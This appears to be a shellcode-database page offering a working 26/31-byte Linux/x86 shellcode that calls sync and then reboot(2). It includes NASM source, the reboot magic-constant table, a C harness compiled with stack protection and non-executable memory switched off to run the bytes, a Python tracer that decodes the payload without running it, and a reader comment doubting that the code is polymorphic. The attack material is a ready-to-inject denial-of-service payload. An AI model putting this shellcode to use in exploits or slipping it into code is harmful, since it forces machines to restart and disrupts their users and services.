Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)

Reference: Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)

shellcode.asm

```nasm
global _start

section .text
_start:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    cdq                     ; edx = 0 (sign-extends eax, which is already 0), same as xor edx, edx
    mov al, 0x58            ; __NR_reboot = 88
    mov ebx, 0xfee1dead     ; magic  = LINUX_REBOOT_MAGIC1
    mov ecx, 672274793      ; magic2 = LINUX_REBOOT_MAGIC2 (0x28121969)
    mov edx, 0x1234567      ; cmd    = LINUX_REBOOT_CMD_RESTART
    int 0x80                ; reboot(magic, magic2, cmd, arg)
```

From man 2 reboot:

| magic | magic2 | cmd | arg |
|---|---|---|---|
| LINUX_REBOOT_MAGIC1 (0xfee1dead) | LINUX_REBOOT_MAGIC2 (672274793/0x28121969) | LINUX_REBOOT_CMD_CAD_OFF (0, kill all, sync, reboot) | |
| | LINUX_REBOOT_MAGIC2A (85072278/0x05121996, since 2.1.17) | LINUX_REBOOT_CMD_CAD_ON (0x89abcdef, `LINUX_REBOOT_CMD_RESTART`) | |
| | LINUX_REBOOT_MAGIC2B (369367448/0x16041998, since 2.1.97) | LINUX_REBOOT_CMD_HALT (0xcdef0123, since 1.1.76, "System halted.", no `sync`) | |
| | LINUX_REBOOT_MAGIC2C (537993216/0x20112000, since 2.5.71) | LINUX_REBOOT_CMD_KEXEC (0x45584543, since 2.6.13, execute a kernel that has been loaded earlier with `kexec_load`, kernel configured with `CONFIG_KEXEC`) | |
| | | LINUX_REBOOT_CMD_POWER_OFF (0x4321fedc, since 2.1.30, "Power down.", no `sync`) | |
| | | LINUX_REBOOT_CMD_RESTART (0x01234567, "Restarting system.", no `sync`) | |
| | | LINUX_REBOOT_CMD_RESTART2 (0xa1b2c3d4, since 2.1.30, "Restarting system with command '%s'", no `sync`) | command string |
| | | LINUX_REBOOT_CMD_SW_SUSPEND (0xd000fce1, since 2.5.18, suspend (hibernate) to disk, kernel configured with `CONFIG_HIBERNATION`) | |

reboot:

```c
#include <unistd.h>
#include <linux/reboot.h>

int reboot(int magic, int magic2, int cmd, void *arg);
```

sync:

```c
#include <unistd.h>

void sync(void);
```

Here’s the modified version:

shellcode-2.asm

```nasm
global _start

section .text
_start:
    xor eax, eax
    mov al, 0x24            ; __NR_sync = 36
    int 0x80                ; sync()

    ; sync() always returns 0, so eax is already zero here and only al needs setting
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
    mov al, 0x58            ; __NR_reboot = 88
    mov ebx, 0xfee1dead     ; LINUX_REBOOT_MAGIC1
    mov ecx, 672274793      ; LINUX_REBOOT_MAGIC2
    mov edx, 0x1234567      ; LINUX_REBOOT_CMD_RESTART
    int 0x80                ; reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART)
```

Embed the shellcode in a C program:

shellcode.c

```c
#include <stdio.h>
#include <string.h>

/* sync() followed by reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2,
   LINUX_REBOOT_CMD_RESTART): 31 bytes, no NUL bytes */
unsigned char code[] = \
"\x31\xc0\xb0\x24\xcd\x80\x31\xdb\x31\xc9\x31\xd2\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";

int main()
{
    /* Jump straight into the byte array, so the data segment must be executable:
       the usual build is gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode.
       reboot(2) requires CAP_SYS_BOOT; run as root this really restarts the machine. */
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
```
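To check what a blob like this actually asks the kernel for without running it, here is an added Python example (not part of the original post) that linearly decodes the small instruction subset the two listings use, tracks the register values, and reports each `int 0x80` with its arguments against the magic and cmd constants from the table above. The 31-byte `MODIFIED` string is the one from shellcode.c; the 26-byte `ORIGINAL` string is my own encoding of shellcode.asm.

```python
import struct

# i386 syscall numbers and reboot(2) constants as listed on this page
SYSCALLS = {0x24: "sync", 0x58: "reboot"}
REBOOT_MAGIC2 = {672274793, 85072278, 369367448, 537993216}
REBOOT_CMDS = {
    0x00000000: "CAD_OFF", 0x89abcdef: "CAD_ON", 0xcdef0123: "HALT",
    0x45584543: "KEXEC", 0x4321fedc: "POWER_OFF", 0x01234567: "RESTART",
    0xa1b2c3d4: "RESTART2", 0xd000fce1: "SW_SUSPEND",
}
# Instruction subset the two listings use: xor r32,r32 / cdq / mov al,imm8 / mov r32,imm32 / int 0x80
XOR_ZERO = {b"\x31\xc0": "eax", b"\x31\xdb": "ebx", b"\x31\xc9": "ecx", b"\x31\xd2": "edx"}
MOV_IMM32 = {0xb8: "eax", 0xbb: "ebx", 0xb9: "ecx", 0xba: "edx"}

def trace_syscalls(code: bytes):
    """Linearly emulate register writes; return (syscall, ebx, ecx, edx) for each int 0x80."""
    regs = {"eax": None, "ebx": None, "ecx": None, "edx": None}
    calls, i = [], 0
    while i < len(code):
        op, pair = code[i], code[i:i + 2]
        if pair in XOR_ZERO:
            regs[XOR_ZERO[pair]] = 0
            i += 2
        elif op == 0x99:  # cdq: edx becomes the sign bit of eax replicated
            regs["edx"] = None if regs["eax"] is None else (0xffffffff if regs["eax"] >> 31 else 0)
            i += 1
        elif op == 0xb0:  # mov al, imm8: only the low byte of eax changes
            regs["eax"] = None if regs["eax"] is None else (regs["eax"] & 0xffffff00) | code[i + 1]
            i += 2
        elif op in MOV_IMM32:
            regs[MOV_IMM32[op]] = struct.unpack_from("<I", code, i + 1)[0]
            i += 5
        elif pair == b"\xcd\x80":
            name = SYSCALLS.get(regs["eax"], f"syscall_{regs['eax']}")
            calls.append((name, regs["ebx"], regs["ecx"], regs["edx"]))
            regs["eax"] = 0 if name == "sync" else None  # sync(2) always returns 0
            i += 2
        else:
            raise ValueError(f"unsupported opcode 0x{op:02x} at offset {i}")
    return calls

def is_reboot_call(call):
    """True when a traced call is reboot(2) with valid magic values and a known cmd."""
    name, magic, magic2, cmd = call
    return name == "reboot" and magic == 0xfee1dead and magic2 in REBOOT_MAGIC2 and cmd in REBOOT_CMDS

# Constructed samples: the 31-byte string from shellcode.c, and my own encoding of shellcode.asm
MODIFIED = bytes.fromhex("31c0b024cd8031db31c931d2b058bbaddee1feb969191228ba67452301cd80")
ORIGINAL = bytes.fromhex("31c031db31c999b058bbaddee1feb969191228ba67452301cd80")
```

`trace_syscalls(MODIFIED)` yields the `sync` call followed by `reboot(0xfee1dead, 672274793, 0x01234567)`, and any opcode outside the subset raises so nothing is silently skipped.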

  • I don’t think it’s a polymorphic shellcode. Maybe it contains cdq?